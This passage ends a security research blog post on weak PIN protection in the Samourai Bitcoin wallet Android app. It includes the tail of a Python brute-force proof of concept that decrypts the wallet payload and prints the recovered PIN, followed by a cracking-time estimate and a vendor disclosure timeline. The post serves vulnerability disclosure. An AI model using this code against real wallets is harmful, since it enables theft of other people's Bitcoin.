    <span class="n">iv</span> <span class="o">=</span> <span class="n">pbkdf2_hmac_key</span><span class="p">.</span><span class="nb">hex</span><span class="p">()[</span><span class="mi">64</span> <span class="p">:</span> <span class="mi">64</span> <span class="o">+</span> <span class="mi">32</span><span class="p">]</span>

    <span class="k">try</span><span class="p">:</span>
        <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">key</span><span class="p">),</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">iv</span><span class="p">))</span>
        <span class="n">plaintext</span> <span class="o">=</span> <span class="n">unpad</span><span class="p">(</span><span class="n">cipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="n">AES</span><span class="p">.</span><span class="n">block_size</span><span class="p">)</span>
        <span class="n">plaintext</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">plaintext</span><span class="p">,</span> <span class="s">'latin-1'</span><span class="p">)[</span><span class="mi">32</span><span class="p">:]</span>  <span class="s">''' Ignore first 16 bytes (IV) '''</span>

        <span class="k">if</span> <span class="s">"passphrase"</span> <span class="ow">in</span> <span class="n">plaintext</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"Decrypted payload: "</span><span class="p">,</span> <span class="n">plaintext</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"PIN: "</span> <span class="o">+</span> <span class="n">pin</span><span class="p">)</span>
            <span class="k">break</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
</pre></table></code></div></div><h2 id="conclusion">Conclusion</h2><p>The main outcome of this research is that the current authentication &amp; respective cryptographic implementation used by Samourai is insufficient to protect the Bitcoin wallets of thousands users that installed and use the application. According to Play Store, there are a total of <strong>100.000+ installs</strong>.</p><p>In an event of mobile device theft, malware or even having the device seized by law enforcement will automatically put the Bitcoins at risk as it would only take approx. 111 million attempts to hit the correct PIN number.</p><p>Also, note that the provided PoC in Python is not optimized, at all, but it could be distributed to multiple machines in a divide &amp; conquer approach and take advantage of concurrency, multithreading, etc.</p><p>We can estimate the required time to brute force all the PIN combinations using a simple laptop. If we can test 10 PINs per second, then it would take around 12 million seconds = 3333 hours = <strong>140 days to test every PIN</strong> (worst case scenario, non-optimized code, low-end cracking hardware).</p><p>Do you think a thief wouldn’t wait a few days to sweep your wallet? Think again.</p><blockquote><p>Not your keys, not your coins!</p></blockquote><h2 id="references">References</h2><ul><li>https://samouraiwallet.com/<li>https://code.samourai.io/wallet/samourai-wallet-android/-/issues/443<li>https://code.samourai.io/wallet/samourai-wallet-android/-/blob/develop/app/src/main/java/com/samourai/wallet/PinEntryActivity.java#L302<li>https://code.samourai.io/wallet/samourai-wallet-android/-/blob/develop/app/src/main/java/com/samourai/wallet/payload/PayloadUtil.java<li>https://code.samourai.io/wallet/ExtLibJ/-/blob/PBKDF2WithHmacSHA256/java/com/samourai/wallet/crypto/AESUtil.java<li>https://code.samourai.io/wallet/ExtLibJ/-/blob/PBKDF2WithHmacSHA256/java/com/samourai/wallet/crypto/KOpenSSL.kt<li>https://support.1password.com/pbkdf2/<li>https://docs.python.org/3/library/hashlib.html#hashlib.pbkdf2_hmac<li>https://www.reddit.com/r/Bitcoin/comments/28p275/can_someone_explain_what_sweeping_is/</ul><h2 id="timeline">Timeline</h2><ul><li>2021-07-04: Issue reported to vendor<li>2021-07-07: Vulnerability acknowledged by vendor<li>2021-07-07: New issue open on Samourai git<li>2021-07-25: New fix &amp; merge request<li>2021-07-26: Fix hardens auth mechanism but doesn’t patch the vulnerability<li>2021-08-03: Addressed as UI/UX issue: “Won’t fix”<li>2021-08-04: Public disclosure</ul></div><div class="post-tail-wrapper text-muted"><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/reverse/" class="post-tag no-text-decoration" >reverse</a> <a href="/tags/application/" class="post-tag no-text-decoration" >application</a> <a href="/tags/apk/" class="post-tag no-text-decoration" >apk</a> <a href="/tags/android/" class="post-tag no-text-decoration" >android</a> <a href="/tags/bitcoin/" class="post-tag no-text-decoration" >bitcoin</a> <a href="/tags/samourai/" class="post-tag no-text-decoration" >samourai</a> <a href="/tags/wallet/" class="post-tag no-text-decoration" >wallet</a> <a href="/tags/pin/" class="post-tag no-text-decoration" >pin</a> <a href="/tags/bypass/" class="post-tag no-text-decoration" >bypass</a> <a href="/tags/authentication/" class="post-tag no-text-decoration" >authentication</a> <a href="/tags/security/" class="post-tag no-text-decoration" >security</a> <a href="/tags/vulnerability/" class="post-tag no-text-decoration" >vulnerability</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation - vrls.ws&url=https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation - vrls.ws&u=https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation - vrls.ws&url=https://vrls.ws/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/2021/02/cve-2021-25648-mobile-application-testes-de-codigo-privilege-escalation/">CVE-2021-25648 - Privilege Escalation in Mobile Application Testes de Código</a><li><a href="/posts/2021/02/bug-bounty-hackerone-bmw-group-shop-session-hijack-xss/">Bug Bounty - Session Takeover in BMW Shops via XSS - HackerOne</a><li><a href="/posts/2021/06/cve-2021-30357-check-point-software-vpn-arbitrary-file-read/">CVE-2021-30357 - Arbitrary file read as root in Check Point VPN client</a><li><a href="/posts/2021/08/samourai-wallet-bitcoin-pin-authentication-bypass-crypto/">Samourai Wallet - Analysis of PIN Authentication & Cryptographic Implementation</a><li><a href="/posts/2021/11/hooking-jit-compiler-dotnet-applications/">Hooking JIT compiler of .NET applications</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/reverse/">reverse</a> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/cve/">cve</a> <a class="post-tag" href="/tags/engineering/">engineering</a> <a class="post-tag" href="/tags/pentest/">pentest</a> <a class="post-tag" href="/tags/security/">security</a> <a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/android/">android</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/2021/02/cve-2021-25648-mobile-application-testes-de-codigo-privilege-escalation/"><div class="card-body"> <span class="timeago small" >Feb 15, 2021<i class="unloaded">2021-02-15T00:00:00+00:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>CVE-2021-25648 - Privilege Escalation in Mobile Application Testes de Código</h3><div class="text-muted small"><p> Vulnerability Details Vendor: TM Mobile Solutions app@testes-codigo.pt Product: “Testes de Código” Mobile Application (Android &amp; iOS) About: The mobile application “Testes de Código” (tdc....</p></div></div></a></div><div class="card"> <a href="/posts/2023/06/obfuscating-rust-binaries-using-llvm-obfuscator-ollvm/"><div class="card-body"> <span class="timeago small" >Jun 12, 2023<i class="unloaded">2023-06-12T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Obfuscating Rust Binaries using LLVM Obfuscator (OLLVM)</h3><div class="text-muted small"><p> UPDATE - 30 November 2023 I have made available a Docker image containing all the required steps to build a Rust toolchain using OLLVM. Currently it is targeting both x86_64-unknown-linux-gnu an...</p></div></div></a></div><div class="card"> <a href="/posts/2023/10/exploiting-noauth-vulnerability-in-azure-ad-applications/"><div class="card-body"> <span class="timeago small" >Oct 24, 2023<i class="unloaded">2023-10-24T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Exploiting nOAuth Vulnerability in Azure AD Applications</h3><div class="text-muted small"><p> Introduction The nOAuth vulnerability was originally discovered by Descope security team and impacts Microsoft Azure AD applications configured to use OAuth. Essentially the vulnerability is a ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/2021/06/cve-2021-30357-check-point-software-vpn-arbitrary-file-read/" class="btn btn-outline-primary" prompt="Older"><p>CVE-2021-30357 - Arbitrary file read as root in Check Point VPN client</p></a> <a href="/posts/2021/11/hooking-jit-compiler-dotnet-applications/" class="btn btn-outline-primary" prompt="Newer"><p>Hooking JIT compiler of .NET applications</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2024 <a href="https://twitter.com/joaovarelas"></a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/reverse/">reverse</a> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/cve/">cve</a> <a class="post-tag" href="/tags/engineering/">engineering</a> <a class="post-tag" href="/tags/pentest/">pentest</a> <a class="post-tag" href="/tags/security/">security</a> <a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/android/">android</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://vrls.ws{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=UA-156800674-1"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-156800674-1'); }); </script>
